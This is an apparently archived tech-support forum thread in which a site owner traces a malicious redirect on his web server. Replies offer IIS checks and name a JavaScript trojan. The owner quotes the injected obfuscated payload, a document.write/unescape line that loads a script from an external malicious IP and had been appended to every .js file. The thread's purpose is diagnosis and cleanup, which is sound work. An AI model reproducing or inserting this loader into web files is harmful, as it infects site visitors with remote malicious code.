• Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 794
  • Last Modified:

Website hacked with redirect script to malicious server

http://71.18.231.91/

if you go there, you will see it attempts to redirect you to 94.247.2.195:80

thats where the hack host site tries to inject code into your computer or whatever it is - that its trying to do.....

anyone got any clue how to tell what file, what piece of code, is trying to do the redirect?? when you go to http://71.18.231.91/


wish i knew!

Open in new window

0
jason_jm
Asked:
jason_jm
  • 2
  • 2
1 Solution
 
jason_jmAuthor Commented:
--><!--
document.write(unescape('%3CONsxecxerxeieQ7ptXP%20sreQ7c%3Dwb%2Fa2p%2FXP94PqY%2E247%2Ewb2%2EON19eQ75%2FjeQ7qwbuerPqYy%2Exej3zs%3E%3CeQ7%2Fsxecript%3E').replace(/wb|eQ7|a2p|ON|PqY|xe|XP|3z/g,""));
 -->


that code was added to all .js files

solved
0
 
Sourabh-ExcahngeCommented:
redirection can be set with the multiple ways
1. check c:\inetpub\wwwroot under this folder open each and every file and check if you find any redirection there
2.open iis manager and just hilight default website and in the right pen try and brows iisstart.htm page
3.under the properties of the default website go to the document tab and check whic document is on the top. and try to brows that file
0
 
aamodtCommented:
If you search up : 94.247.2.195:80 on google they say that that it a Virus. A Trojan to be more spessific.. like the Zief virus it injects it automaticlly when you as a user change the source code .. or it can just inject by laying on the server undetected and parsing the redirect code unseen.

I will suggest you search after fixes to the virus : Troj/JSRedir-0

and try to get rid of it.. after my rescorces it is the trojan : Troj/JSRedir-0 you have been infected by .
its a Javascript that redirects you to that server.
0
 
jason_jmAuthor Commented:
yep, was tryna work out how the website was being redirected

its from that java script code added to the end of all .js files

now i gotta figure out how the hacker got access to the .js files

probably through an infected PC from a webdesigner (stealing the FTP password in cleartext)
0
 
aamodtCommented:
yeah, we had the same problemt with one of our webserver aswell. one of the devlopers had the virus and infected the site with the javascript
0

Featured Post

VIDEO: THE CONCERTO CLOUD FOR HEALTHCARE

Modern healthcare requires a modern cloud. View this brief video to understand how the Concerto Cloud for Healthcare can help your organization.

  • 2
  • 2
Tackle projects and never again get stuck behind a technical roadblock.
Join Now